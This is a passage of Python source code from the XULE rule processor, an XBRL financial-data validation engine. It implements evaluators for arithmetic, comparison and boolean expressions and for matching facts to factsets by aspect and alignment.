:param add_expr: Rule expression for the constant declaration
:type add_expr: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
This includes add and subtract. These operations can be perforom on numbers, strings, sets and list. For strings
adding wil concatenation. For lists and strings, adding will union.
In other binary operations, if an operand does not exist the operation is not performed. With add and subtract, if an
operand is missing, it will treated as if it were zero. For example:
@Assets + @Liabilities
If there isn't a matching liability for an asset, the operation will return the value of assets.
"""
left_bar = add_expr['rights'][0]['op'][0] == '<' # the first operator
if left_bar:
left = evaluate(add_expr['leftExpr'], xule_context)
else:
# unbound is allowed, so it needs to be captured.
try:
left = evaluate(add_expr['leftExpr'], xule_context)
except XuleIterationStop as xis:
left = xis.stop_value # XuleValue(xule_context, None, 'unbound')
for right in add_expr['rights']:
operator = right['op']
right_bar = operator[-1] == '>'
left_bar = operator[0] == '<'
right_expr = right['rightExpr']
if left.type not in (
'int', 'float', 'decimal', 'string', 'uri', 'instant', 'time-period', 'set', 'list', 'unbound', 'none'):
raise XuleProcessingError(_("Left side of a {} operation cannot be {}.".format(operator, left.type)),
xule_context)
if right_bar:
right = evaluate(right_expr, xule_context)
else:
# unbound is allowed, so it needs to be captured.
try:
right = evaluate(right_expr, xule_context)
except XuleIterationStop as xis:
right = xis.stop_value
if right.type not in (
'int', 'float', 'decimal', 'string', 'uri', 'instant', 'time-period', 'set', 'list', 'unbound', 'none'):
raise XuleProcessingError(_("Right side of a {} operation cannot be {}.".format(operator, right.type)),
xule_context)
# A time-period can be on the left only if the right is also a time period.
if left.type == 'time-period' and right.type != 'time-period':
raise XuleProcessingError(_("Incompatabile operands {} {} {}.".format(left.type, operator, right.type)),
xule_context)
do_calc = True
if left_bar and left.type in ('unbound', 'none'):
raise XuleIterationStop(XuleValue(xule_context, None, 'unbound'))
if right_bar and right.type in ('unbound', 'none'):
raise XuleIterationStop(XuleValue(xule_context, None, 'unbound'))
if left.type in ('unbound', 'none'):
# This is a special case for numbers. The left is none/unbound and the right is number. The new value will
# be the negative of the right.
if right.type in ('int', 'float', 'decimal') and '-' in operator:
right = XuleValue(xule_context, right.value * -1, right.type)
left = right
do_calc = False
if right.type in ('unbound', 'none'):
do_calc = False
# this ensures that if there is no value in the entire expression, the final value will be skipped.
if left.type == 'none':
left.type = 'unbound'
if do_calc:
combined_type, left_compute_value, right_compute_value = combine_xule_types(left, right, xule_context)
if combined_type == 'unbound':
raise XuleProcessingError(_("Incompatabile operands {} {} {}.".format(left.type, operator, right.type)),
xule_context)
if '+' in operator:
if left.type == 'set' and right.type == 'set':
# use union for sets
# left = XuleValue(xule_context, left_compute_value | right_compute_value, 'set')
left = XuleUtility.add_sets(xule_context, left, right)
else:
left = XuleValue(xule_context, left_compute_value + right_compute_value, combined_type)
elif '-' in operator:
if left.type == 'set' and right.type == 'set':
left = XuleUtility.subtract_sets(xule_context, left, right)
else:
left = XuleValue(xule_context, left_compute_value - right_compute_value, combined_type)
else:
raise XuleProcessingError(
_("Unknown operator '%s' found in addition/subtraction operation." % operator), xule_context)
return left
def evaluate_comp(comp_expr, xule_context):
"""Evaluator for comparison expressions
:param comp_expr: Rule expression for the constant declaration
:type comp_expr: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
Comparison includes ==, !=, >, < >=, <=, in, not in
"""
left = evaluate(comp_expr['leftExpr'], xule_context)
for right in comp_expr['rights']:
operator = right['op']
right_expr = right['rightExpr']
right = evaluate(right_expr, xule_context)
interim_value = None
combined_type, left_compute_value, right_compute_value = combine_xule_types(left, right, xule_context)
if left.type in ('instant', 'duration') and right.type in ('instant', 'duration'):
left_compute_value = XulePeriodComp(left_compute_value)
right_compute_value = XulePeriodComp(right_compute_value)
if left.type in ('list', 'set'):
left_compute_value = left.shadow_collection
if left.type == 'dictionary':
left_compute_value = dict(left.shadow_collection)
if right.type in ('list', 'set'):
right_compute_value = right.shadow_collection
if right.type == 'dictionary':
right_compute_value = dict(right.shadow_collection)
if operator == '==':
interim_value = XuleValue(xule_context, left_compute_value == right_compute_value, 'bool')
elif operator == '!=':
interim_value = XuleValue(xule_context, left_compute_value != right_compute_value, 'bool')
elif operator == 'in':
interim_value = XuleValue(xule_context, left_compute_value in right_compute_value, 'bool')
elif operator == 'not in':
interim_value = XuleValue(xule_context, left_compute_value not in right_compute_value, 'bool')
elif operator in ('<', '>'):
if left.type == 'none' or right.type == 'none':
interim_value = XuleValue(xule_context, None, 'none')
elif operator == '<':
interim_value = XuleValue(xule_context, left_compute_value < right_compute_value, 'bool')
elif operator == '>':
interim_value = XuleValue(xule_context, left_compute_value > right_compute_value, 'bool')
elif operator in ('<=', '>='):
if left.type == 'none' and right.type == 'none':
interim_value = XuleValue(xule_context, True, 'bool')
elif left.type == 'none' or right.type == 'none':
interim_value = XuleValue(xule_context, None, 'none')
elif operator == '<=':
interim_value = XuleValue(xule_context, left_compute_value <= right_compute_value, 'bool')
elif operator == '>=':
interim_value = XuleValue(xule_context, left_compute_value >= right_compute_value, 'bool')
else:
raise XuleProcessingError(_("Unknown operator '%s'." % operator), xule_context)
left = interim_value
return left
def evaluate_not(not_expr, xule_context):
"""Evaluator for not expressions
:param not_expr: Rule expression for the constant declaration
:type not_expr: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
"""
initial_value = evaluate(not_expr['expr'], xule_context)
if initial_value.type in ('unbound', 'none'):
return initial_value
if initial_value.type != 'bool':
raise XuleProcessingError(
_("The operand of the 'not' expression must be boolean, found '%s'" % initial_value.type), xule_context)
return XuleValue(xule_context, not initial_value.value, 'bool')
def evaluate_and(and_expr, xule_context):
"""Evaluator for boolean and expressions
:param and_expr: Rule expression for the constant declaration
:type and_expr: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
"""
value_found = False
has_unbound = False
left = XuleValue(xule_context, None, 'unbound')
# Create a single list of expressions combing the left and each of the rights.
exprs = [and_expr['leftExpr'], ] + [x['rightExpr'] for x in and_expr['rights']]
# This process will allow unbounds if at some point a false is found. In this case the and expression is false. Otherwise, unbounds will make the result unbound.
for expr in exprs:
if value_found:
break
else:
try:
right = evaluate(expr, xule_context)
except XuleIterationStop as xis:
right = xis.stop_value # XuleValue(xule_context, None, 'unbound')
if right.type in ('unbound', 'none'):
has_unbound = True
if left.type not in ('unbound', 'none', 'bool') or right.type not in ('unbound', 'none', 'bool'):
raise XuleProcessingError(_(
"Operand of 'and' expression is not boolean. Left and right operand types are '%s' and '%s'." % (
left.type, right.type)), xule_context)
if left.type == 'bool' and right.type == 'bool':
left = XuleValue(xule_context, left.value and right.value, 'bool')
if left.value == False:
value_found = True
elif left.type in ('unbound', 'none') and right.type in ('unbound', 'none'):
continue
elif left.type in ('unbound', 'none') and right.type == 'bool':
left = right
if left.value == False:
value_found = True
elif left.type == 'bool' and right.type in ('unbound', 'none'):
if left.value == False:
value_found = True
if (has_unbound and value_found) or not has_unbound:
return left
else:
return XuleValue(xule_context, None, 'unbound')
def evaluate_or(or_expr, xule_context):
"""Evaluator for boolean or expressions
:param or_expr: Rule expression for the constant declaration
:type or_expr: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValue
"""
value_found = False
has_unbound = False
left = XuleValue(xule_context, None, 'unbound')
# Create a single list of expressions combing the left and each of the rights.
exprs = [or_expr['leftExpr'], ] + [x['rightExpr'] for x in or_expr['rights']]
for expr in exprs:
if value_found:
break
else:
try:
right = evaluate(expr, xule_context)
except XuleIterationStop as xis:
right = xis.stop_value # XuleValue(xule_context, None, 'unbound')
if right.type in ('unbound', 'none'):
has_unbound = True
if left.type not in ('unbound', 'none', 'bool') or right.type not in ('unbound', 'none', 'bool'):
raise XuleProcessingError(_(
"Operand of 'or' expression is not boolean. Left and right operand types are '%s' and '%s'." % (
left.type, right.type)), xule_context)
if left.type == 'bool' and right.type == 'bool':
left = XuleValue(xule_context, left.value or right.value, 'bool')
if left.value == True:
value_found = True
elif left.type in ('unbound', 'none') and right.type in ('unbound', 'none'):
continue
elif left.type in ('unbound', 'none') and right.type == 'bool':
left = right
if left.value == True:
value_found = True
elif left.type == 'bool' and right.type in ('unbound', 'none'):
if left.value == True:
value_found = True
if (has_unbound and value_found) or not has_unbound:
return left
else:
return XuleValue(xule_context, None, 'unbound')
def evaluate_factset(factset, xule_context):
"""Evaluator for a factset
:param factset: Rule expression for the constant declaration
:type factset: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValueSet
There are two flavors of factsets.
1. Starndard factset - finds facts in the instance (i.e. @Assets)
2. Factset with inner expression - This is really an envelope that sets up aspect filters for other factsets that are inside the envelope.
"""
if 'innerExpr' in factset:
return evaluate_nesting_factset(factset, xule_context)
else:
return evaluate_factset_detail(factset, xule_context)
def evaluate_nesting_factset(factset, xule_context):
"""Evaluate a factset envolope
:param factset: Rule expression for the constant declaration
:type factset: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValueSet
"""
aspect_filters, _x, aspect_vars = process_factset_aspects(factset, xule_context)
# verify that there are not already filters in place
current_filters, _x = xule_context.get_current_filters()
current_aspects = {aspect_info[ASPECT] for aspect_info in current_filters}
factset_aspects = {aspect_info[ASPECT] for aspect_info in aspect_filters}
if current_aspects & factset_aspects:
raise XuleProcessingError(_(
"A nested factset clause cannot include aspects in an outer factset clause, found '%s'." % ", ".join(
current_aspects & factset_aspects)), xule_context)
# add the align aspects to the nested_filter in the context
xule_context.filter_add('nested', aspect_filters)
save_aligned_result_only = xule_context.aligned_result_only
save_used_expressions = xule_context.used_expressions
nested_table = xule_context.iteration_table.add_table(factset['node_id'],
xule_context.get_processing_id(factset['node_id']),
is_aggregation=True)
nested_values = XuleValueSet()
try:
while True:
xule_context.aligned_result_only = False
xule_context.used_expressions = set()
try:
nested_value = evaluate(factset['innerExpr'], xule_context)
except XuleIterationStop:
nested_value = XuleValue(xule_context, None, 'unbound', tag=XuleValue(xule_context, None, 'none'))
# if not(xule_context.iteration_table.current_table.current_alignment is None and xule_context.aligned_result_only):
# remove the with portion of the alignment
#if xule_context.iteration_table.current_table.current_alignment is not None: # this should be the alignment on the with table
remove_aspects = [(with_filter[0], with_filter[1]) for with_filter in aspect_filters]
if factset.get('covered', False):
new_alignment = None
remove_alignments(nested_value)
elif xule_context.iteration_table.current_alignment is None:
new_alignment = None
else:
new_alignment = remove_from_alignment(xule_context.iteration_table.current_alignment,
remove_aspects, xule_context)
nested_value.alignment = new_alignment
nested_value.facts = xule_context.facts.copy()
nested_value.tags = xule_context.tags.copy()
nested_values.append(nested_value)
# xule_context.iteration_table.del_current()
xule_context.iteration_table.next(nested_table.table_id)
if nested_table.is_empty:
break
finally:
xule_context.aligned_result_only = save_aligned_result_only
xule_context.used_expressions = save_used_expressions
# delete the with table (in case it is left behind from an exception)
xule_context.iteration_table.del_table(nested_table.table_id)
xule_context.filter_del()
return nested_values
def remove_alignments(val):
val.alignment = None
val.aligned_result_only = False
if val.type in ('list', 'set'):
for child_val in val.value:
remove_alignments(child_val)
if val.type == 'dictionary':
for key, child_val in val.value:
remove_alignments(key)
remove_alignments(chidl_val)
def evaluate_factset_detail(factset, xule_context):
"""Evaluate a factset
:param factset: Rule expression for the constant declaration
:type factset: dict
:param xule_context: Rule processing context
:type xule_context: XuleRuleContext
:rtype: XuleValueSet
The factset is divided into two parts. The first part contains aspects that will be used to filter the fact and will NOT
be used for alignment. For example: "Assets[]" or "[lineItem=Assets]". These factsets will find all the 'Assets' facts in the
instance, but when these facts are compared to facts in other fact sets, the 'concept' aspect will not be used to check alignment.
Actual aspects of the fact that are not specified in the first part of the factset will be used for alignment.
Nested alignment:
This would be put in the context for nested factset expressions. It would cause downstream factset evaluations
to include the filter as part of getting facts. If the filter is 'closed', it would act like a closed factset and not allow
facts that have dimenions in fact's alignment that are not in the filter. 'open' filters wouldn't care.
This provides an alternative mechanism for handling alignment. Instead of getting all results for each side of an operation (i.e. property)
and then aligning them, it would allow the expression to iterate over one operand result set and evaluate for each result of the other operand.
By pushing the filter, first, only the aligned results will come back.
"""
f_start = datetime.datetime.today()
# #The no alignment flag indicates that the results of the factset should all have none alignment. It is set by the 'values' expression.
saved_used_expressions = xule_context.used_expressions
xule_context.used_expressions = set()
try:
non_align_aspects, align_aspects, aspect_vars = process_factset_aspects(factset, xule_context)
finally:
used_expressions = xule_context.used_expressions
xule_context.used_expressions = saved_used_expressions | xule_context.used_expressions
# check if any non_align_aspects overlap with nested_filters
nested_factset_filters, other_filters = xule_context.get_current_filters()
# This restriction is removed to suport rules like r1923
# if with_aspects & factset_aspects:
# raise XuleProcessingError(_("The factset cannont contain any aspects in any bounding 'with' clause, found '%s'." % ", ".join(with_aspects & factset_aspects)), xule_context)
# combine all the filtering aspects.
all_aspect_filters = list(nested_factset_filters.items()) + list(other_filters.items()) + list(
non_align_aspects.items())
# If the the factset is dependent, then we only need to find facts that also match the current alignment. Create filters based on the current alignment.
dependent_filters = list()
if not factset.get('covered') and factset['is_dependent']:
if xule_context.dependent_alignment is None:
# The table may acquire the dependent alignment after evaluating the aspect filters
xule_context.iteration_table.current_table.make_dependent()
try:
if xule_context.dependent_alignment is not None:
unfrozen_alignment = {k: v for k, v in xule_context.dependent_alignment}
dependent_filters = list(alignment_to_aspect_info(unfrozen_alignment, xule_context).items())
except IndexError:
pass
all_aspect_filters += list(align_aspects.items()) + dependent_filters
'''Match facts based on the aspects in the first part of the factset and any additional filters.
This is done by intersecting the sets of the fact_index. The fact index is a dictionary of dictionaries.
The outer dictionary is keyed by aspect and the inner by member. So fact_index[aspect][member] contains a
set of facts that have that aspect and member.'''
pre_matched_facts = factset_pre_match(factset, all_aspect_filters, non_align_aspects, align_aspects, xule_context)
pre_count1 = len(pre_matched_facts)
f_pre_end = datetime.datetime.today()
# For dependent factset, set flag to check if the iteration table becomes aligned.
# Bassically, there is no alignment yet. During the evaluation of the where clause a first time evaluated variable can create alignment.
# If this happens, the pre matched facts should only include those facts that have matching alignment. So a flag in the context is set to check if the table becomes aligned.
# When this happens a XuleReEvaluate exception is raised (this happens in the main evaluator()).
saved_look_for_alignment = xule_context.look_for_alignment
saved_where_table_ids = xule_context.where_table_ids
saved_where_dependent_iterables = xule_context.where_dependent_iterables
if factset['is_dependent'] and xule_context.iteration_table.any_alignment is None:
xule_context.look_for_alignment = True
# xule_context.where_table_ids = list(xule_context.iteration_table._ordered_tables.keys())
xule_context.where_table_ids = [table.table_id for table in
xule_context.iteration_table._ordered_tables.values()]
xule_context.where_dependent_iterables = [di['node_id'] for di in factset['dependent_iterables']]
else:
# set_look_for_alignment = False
xule_context.look_for_alignment = False
# print(factset['node_id'], fact_value, no_pre_where_alignment, xule_context.iteration_table.current_table.table_id)
default_where_used_expressions = set()
recalc = False
recalc_none = False
try:
results, default_where_used_expressions = process_filtered_facts(factset,
pre_matched_facts,
factset.get('covered', False),
non_align_aspects,
align_aspects,
nested_factset_filters,
aspect_vars, used_expressions, xule_context)
except XuleReEvaluate as xac:
recalc = True
# turn off looking for changes during the where evaluation. At this point either there is no alignment, so the result will be empty or
# there is alignment and the pre_matched_facts will be refiltered with the alignment. In this case, we don't need to continue looking for
# evaluating an iterable that can produce alignment.
xule_context.iteration_table.current_table.make_dependent()
xule_context.look_for_alignment = False
if xac.alignment is None:
recalc_none = True
# there are no matching facts in the dependent iterable (that has alignments)
results = XuleValueSet()
else:
# This occurs if the alignment is created while processing where clause. Re-filter the pre_matched facts with the alignment information and try the where clause again
# Add the alignment to the all_aspect filters
# if xac.alignment is None:
# #in this case the no facts can match because the dependency is unaligned but would normally have alignment. This is basicaly the default value of 'unbound'
# #for a factset.
# results = XuleValueSet()
# else:
unfrozen_alignment = {k: v for k, v in xac.alignment}
additional_aspect_filters = list(alignment_to_aspect_info(unfrozen_alignment, xule_context).items())
pre_matched_facts = factset_pre_match(factset, additional_aspect_filters, non_align_aspects, align_aspects,
xule_context, starting_facts=pre_matched_facts)
# try again
try:
results, default_where_used_expressions = process_filtered_facts(factset, pre_matched_facts,
not factset.get('covered'),
non_align_aspects,
align_aspects,
nested_factset_filters, aspect_vars,
used_expressions, xule_context)
except XuleReEvaluate as xac:
# In the second pass, the alignment change should not happen.
raise XuleProcessingError(
_("Encountered 2nd alignment change while processing the 'where' clause for a factset"),
xule_context)
finally:
# if set_look_for_alignment:
xule_context.look_for_alignment = saved_look_for_alignment
xule_context.where_table_ids = saved_where_table_ids
xule_context.where_dependent_iterables = saved_where_dependent_iterables
if None not in results.values:
expr_aspect_filters = non_align_aspects.copy()
expr_aspect_filters.update(align_aspects)
# default_value = XuleValue(xule_context, None, 'unbound', tag=XuleValue(xule_context, tag_default_for_factset(expr_aspect_filters, xule_context), 'empty_fact'))
default_value = XuleValue(xule_context, None, 'unbound', tag=XuleValue(xule_context, None, 'none'))
'''The current list of facts and tags are not inlcuded on the default None fact in a factset. This was causing problems with a exists() and missing().
The default None fact in the missing would have the tags and facts from the first evaluation, but then these would be applied on consequent
iterations where the tags from the first iteration would overwrite the tags on the consequent iterations.'''
# default_value.facts = xule_context.facts
# default_value.tags = xule_context.tags
# default_value.used_vars = get_used_vars(xule_context, xule_context.used_vars)
default_value.used_expressions = used_expressions | default_where_used_expressions
# print("default fact", factset['exprName'], factset['node_id'], len(xule_context.used_expressions), len(default_value.used_expressions))
if not factset.get('covered'):
default_value.aligned_result_only = True
results.append(default_value)
f_end = datetime.datetime.today()
return results
def factset_pre_match(factset, filters, non_aligned_filters, align_aspects, xule_context, starting_facts=None):
"""Match facts based on the factset
Match facts based on the aspects in the first part of the factset and any additional filters.
This is done by intersecting the sets of the fact_index. The fact index is a dictionary of dictionaries.
The outer dictionary is keyed by aspect and the inner by member. So fact_index[aspect][member] contains a
set of facts that have that aspect and member.
"""
if starting_facts is None:
pre_matched_facts = None
first = True
else:
pre_matched_facts = copy.copy(starting_facts)
first = False
# first = pre_matched_facts is None
for aspect_info, filter_member in filters:
# Handle case where the filter only contains boolean values. Treat the filter_member as true.
# For example: @concept.is-numeric This should be treated as @concept.is-numeric=true
if (filter_member is None and
aspect_info[ASPECT_OPERATOR] is None and
aspect_info[SPECIAL_VALUE] is None and
aspect_info[ASPECT_PROPERTY] is not None):
aspect_info = list(aspect_info)
aspect_info[ASPECT_OPERATOR] = '='
filter_member = XuleValue(xule_context, True, 'bool')
if filter_member is not None:
# if aspect_info[ASPECT_PROPERTY] is None:
# index_key = (aspect_info[TYPE], aspect_info[ASPECT])
# else:
# # aspect_info[ASPECT_PROPERTY][0] is the aspect property name
# # aspect_info[ASPECT_PROPERTY][1] is a tuple of the arguments
# index_key = ('property', aspect_info[ASPECT], aspect_info[ASPECT_PROPERTY][0]) + \
# aspect_info[ASPECT_PROPERTY][1]
# if index_key not in xule_context.fact_index and index_key not in _FACT_INDEX_PROPERTIES:
# raise XuleProcessingError(_(
# "Factset aspect property '{}' is not a valid property of aspect '{}'.".format(index_key[2],
# index_key[1])),
# xule_context)
index_key = fact_index_key(aspect_info, xule_context)
facts_by_aspect = set()
'''THIS MIGHT BE MORE EFFICIENTLY HANDLED BY IGNORING THE ASPECT IF THE MEMBER IS None OR ELIMINATING ALL FACTS'''
# When the aspect key is not in the fact index, then the instance doesn't use this aspect (dimension). So create an entry for the 'None' key and put all the facts in it.
if index_key not in xule_context.fact_index:
xule_context.fact_index[index_key][None] = xule_context.fact_index['all']
if aspect_info[SPECIAL_VALUE] is not None:
if aspect_info[SPECIAL_VALUE] == '*':
if aspect_info[ASPECT_OPERATOR] == '=':
if aspect_info[TYPE] == 'builtin' and aspect_info[ASPECT] in ('concept', 'period', 'entity') and aspect_info[ASPECT_PROPERTY] is None:
# this is all facts
continue
else:
# need to combine all the facts that have that aspect
facts_by_aspect = set(it.chain.from_iterable(
v for k, v in xule_context.fact_index[index_key].items() if k is not None))
else: # the operator is != ('in' and 'not in' are not allowed with a special value)
if aspect_info[TYPE] == 'builtin' and aspect_info[ASPECT] in ('concept', 'period', 'entity'):
# No facts can match these aspects not equal to * (i.e. @concept != *)
pre_matched_facts = []
break
else:
facts_by_aspect = xule_context.fact_index[index_key][None]
else:
if aspect_info[ASPECT_OPERATOR] == 'in' and filter_member.type not in ('list', 'set'):
raise XuleProcessingError(_("The value for '%s' with 'in' must be a set or list, found '%s'" % (
index_key[ASPECT], filter_member.type)), xule_context)
# fix for aspects that take qname members (concept and explicit dimensions. The member can be a concept or a qname. The index is by qname.
if index_key in (('builtin', 'concept'), ('property', 'cube', 'name')):
if aspect_info[ASPECT_OPERATOR] in ('=', '!='):
member_values = {convert_value_to_qname(filter_member, xule_context), }
else:
member_values = {convert_value_to_qname(x, xule_context) for x in filter_member.value}
elif index_key[TYPE] == 'explicit_dimension':
if aspect_info[ASPECT_OPERATOR] in ('=', '!='):
if filter_member.type == 'concept':
member_values = {convert_value_to_qname(filter_member, xule_context), }
else:
member_values = {filter_member.value, }
else:
member_values = {convert_value_to_qname(x, xule_context) if x.type == 'concept' else x.value for x
in filter_member.value}
# Also fix for period aspect
elif index_key == ('builtin', 'period'):
if aspect_info[ASPECT_OPERATOR] in ('=', '!='):
member_values = {convert_value_to_model_period(filter_member, xule_context), }
else:
member_values = {convert_value_to_model_period(x, xule_context) for x in filter_member.value}
# Allow units to be a qname or a xule 'unit'
elif index_key == ('builtin', 'unit'):
conversion_function = lambda x: XuleUnit(x) if x.type == 'qname' else x.value
if aspect_info[ASPECT_OPERATOR] in ('=', '!='):
member_values = {conversion_function(filter_member), }
else:
member_values = {conversion_function(x) for x in filter_member.value}
# Allow @table.drs-role to take a short role name
elif index_key == ('property', 'cube', 'drs-role'):
if aspect_info[ASPECT_OPERATOR] in ('=', '!='):
member_values = {convert_value_to_role(filter_member, xule_context), }
else:
member_values = {convert_value_to_role(x, xule_context) for x in filter_member.value}
else:
if aspect_info[ASPECT_OPERATOR] in ('=', '!='):
member_values = {filter_member.value, }
else:
member_values = {x.value for x in filter_member.value}
'''THIS COULD USE THE SHADOW COLLECTION
member_values = set(filter_member.shadow_collection)
'''
if aspect_info[ASPECT_OPERATOR] in ('=', 'in'):
found_members = member_values & xule_context.fact_index[index_key].keys()
else: # aspect operator is '!=' or 'not in'
found_members = (xule_context.fact_index[index_key].keys() - {None, }) - member_values
for member in found_members:
facts_by_aspect |= xule_context.fact_index[index_key][member]
# intersect the facts with previous facts by aspect
if first:
first = False
pre_matched_facts = facts_by_aspect
else:
pre_matched_facts &= facts_by_aspect
if first:
# there were no apsects to start the matching, so use the full set
# pre_matched_facts = xule_context.model.factsInInstance
pre_matched_facts = xule_context.fact_index['all']
if starting_facts is None:
# Check the alignment of pre matched facts to the dependent alignment
if xule_context.dependent_alignment is not None and factset.get('is_dependent', False):
match_aligned_facts = set()
for fact in pre_matched_facts:
fact_alignment = calc_fact_alignment(factset, fact, non_aligned_filters, align_aspects, True, xule_context)
if fact_alignment == xule_context.dependent_alignment:
match_aligned_facts.add(fact)
pre_matched_facts = match_aligned_facts
'''
#This code reduces the pre matched facts to those that match alignment of the dependent alignment by using the fact index of dimensions that are not
#in the dependent alignment. The method of checking the alignment used above proved to be more efficient. However, it may be that if the pre match includes a large number
#of facts this method may be better.
if xule_context.dependent_alignment is not None and factset.is_dependent:
if not hasattr(factset, 'empty_dimension_list'):
aligned_dimensions = [(k[0], k[1]) for k, v in aligned_filters if k[0] == 'explicit_dimension']
empty_dimensions = [k for k in xule_context.fact_index.keys() if k[0] == 'explicit_dimension' and k not in aligned_dimensions]
factset.empty_dimension_list = empty_dimensions
for empty_dim_key in factset.empty_dimension_list:
pre_matched_facts &= xule_context.fact_index[empty_dim_key][None]
'''
return pre_matched_facts
def fact_index_key(aspect_info, xule_context):
if aspect_info[ASPECT_PROPERTY] is None:
index_key = (aspect_info[TYPE], aspect_info[ASPECT])
else:
# aspect_info[ASPECT_PROPERTY][0] is the aspect property name
# aspect_info[ASPECT_PROPERTY][1] is a tuple of the arguments
index_key = ('property', aspect_info[ASPECT], aspect_info[ASPECT_PROPERTY][0]) + \
aspect_info[ASPECT_PROPERTY][1]
if index_key not in xule_context.fact_index and index_key not in _FACT_INDEX_PROPERTIES and aspect_info[ASPECT_PROPERTY][0] != 'attribute':
raise XuleProcessingError(_(
"Factset aspect property '{}' is not a valid property of aspect '{}'.".format(index_key[2],
index_key[1])),
xule_context)
return index_key
def calc_fact_alignment(factset, fact, non_aligned_filters, align_aspects_filters, frozen, xule_context):
if fact not in xule_context.fact_alignments[factset['node_id']]:
unfrozen_alignment = get_alignment(fact,
non_aligned_filters,
align_aspects_filters,
xule_context,
factset.get('coveredDims', False),
factset.get('covered', False))
if len(unfrozen_alignment) == 0 and factset.get('covered', False):
unfrozen_alignment = None
fact_alignment = None
else:
fact_alignment = frozenset(unfrozen_alignment.items())
xule_context.fact_alignments[factset['node_id']][fact] = (fact_alignment, unfrozen_alignment)
return fact_alignment if frozen else unfrozen_alignment
return xule_context.fact_alignments[factset['node_id']][fact][0 if frozen else 1]
def process_filtered_facts(factset, pre_matched_facts, current_no_alignment, non_align_aspects, align_aspects,
nested_filters, aspect_vars, pre_matched_used_expressoins_ids, xule_context):
"""Apply the where portion of the factset"""
results = XuleValueSet()
default_used_expressions = set()
for model_fact in pre_matched_facts:
# assume the fact will matach the where clause.
matched = True
# check if nill
exclude_nils = (factset.get('excludeNils', False) or
(getattr(xule_context.global_context.options, "xule_exclude_nils", False) and not factset.get(
'includeNils', False))
)
if exclude_nils and model_fact.isNil:
# if not xule_context.include_nils and model_fact.isNil:
continue
'''The alignment is all the aspects that were not specified in the first part of the factset (non_align_aspects).'''
# set up potential fact result
alignment = calc_fact_alignment(factset, model_fact, non_align_aspects, align_aspects, False, xule_context)
'''If we are in a innner factset, the alignment needs to be adjusted. Each aspect in the outer factset should be in the alignment even if
if it is in the factset aspects (which would normally take that aspect out of the alignment).'''
for nested_aspect_info in nested_filters:
alignment_info = (nested_aspect_info[TYPE], nested_aspect_info[ASPECT])
if alignment is None or alignment_info not in alignment:
if alignment_info == ('builtin', 'concept'):
alignment_value = model_fact.qname
# alignment_value = model_fact.elementQname
elif alignment_info == ('builtin', 'unit'):
if model_fact.isNumeric:
alignment_value = model_to_xule_unit(model_fact.unit, xule_context)
elif alignment_info == ('builtin', 'period'):
alignment_value = model_to_xule_period(model_fact.context, xule_context)
elif alignment_info == ('builtin', 'entity'):
alignment_value = model_to_xule_entity(model_fact.context, xule_context)
elif alignment_info[TYPE] == 'explicit_dimension':
model_dimension = model_fact.context.qnameDims.get(alignment_info[ASPECT])
if model_dimension is None:
alignment_value = None
else:
if model_dimension.isExplicit:
alignment_value = model_dimension.memberQname
else:
alignment_value = model_dimension.typedMember.xValue
# NEED TO CHECK WHAT THE VALUE SHOULD BE
else:
raise XuleProcessingError(_(
"Pushing nested factset filter alignment, found unknown alignment '%s : %s'" % alignment_info),
xule_context)
if alignment is None:
# There was no alignment, but now an aspect is being added to the alignment
alignment = {} #dict
alignment[alignment_info] = alignment_value
'''Check closed factset'''
if factset['factsetType'] == 'closed':
aspect_dimensions = {aspect_info[ASPECT] for aspect_info in non_align_aspects}
if set(model_fact.context.qnameDims.keys()) - aspect_dimensions:
continue
if alignment is not None:
# if not current_no_alignment and xule_context.iteration_table.is_dependent:
# if not current_no_alignment and factset['is_dependent']:
if factset['is_dependent']:
if xule_context.dependent_alignment is not None:
if frozenset(alignment.items()) != xule_context.dependent_alignment:
# If this is in a 'with' clause, the first factset to be added to the with/agg table may be empty, The current alignment will be
# from a higher table which will not include the with filter aspects.
if len(
nested_filters) > 0 and xule_context.iteration_table.current_table.current_alignment is None:
remove_aspects = [(nested_filter[0], nested_filter[1]) for nested_filter in nested_filters]
adjusted_alignment = remove_from_alignment(frozenset(alignment.items()), remove_aspects,
xule_context)
if adjusted_alignment != xule_context.dependent_alignment:
continue # try the next fact from the pre match
else:
continue # try the next fact from the pre match
if factset.get('nilDefault', False) and model_fact.isNil:
# Handle nil value where the value should be defaulted.
if (model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'monetaryItemType') or
model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'decimalItemType') or
model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'sharesItemType') or
model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'pureItemType')):
xule_type = 'decimal'
system_value = decimal.Decimal(0)
elif (model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'floatItemType') or
model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'doubleItemType')):
xule_type = 'float'
system_value = 0.0
elif (model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'integerItemType') or
model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'nonPositiveIntegerItemType') or
model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'longItemType') or
model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'intItemType') or
model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'shortItemType') or
model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'nonNegativeIntegerItemType') or
model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'unsignedLongItemType') or
model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'unsignedIntItemType') or
model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'unsignedShortItemType')):
xule_type = 'int'
system_value = 0
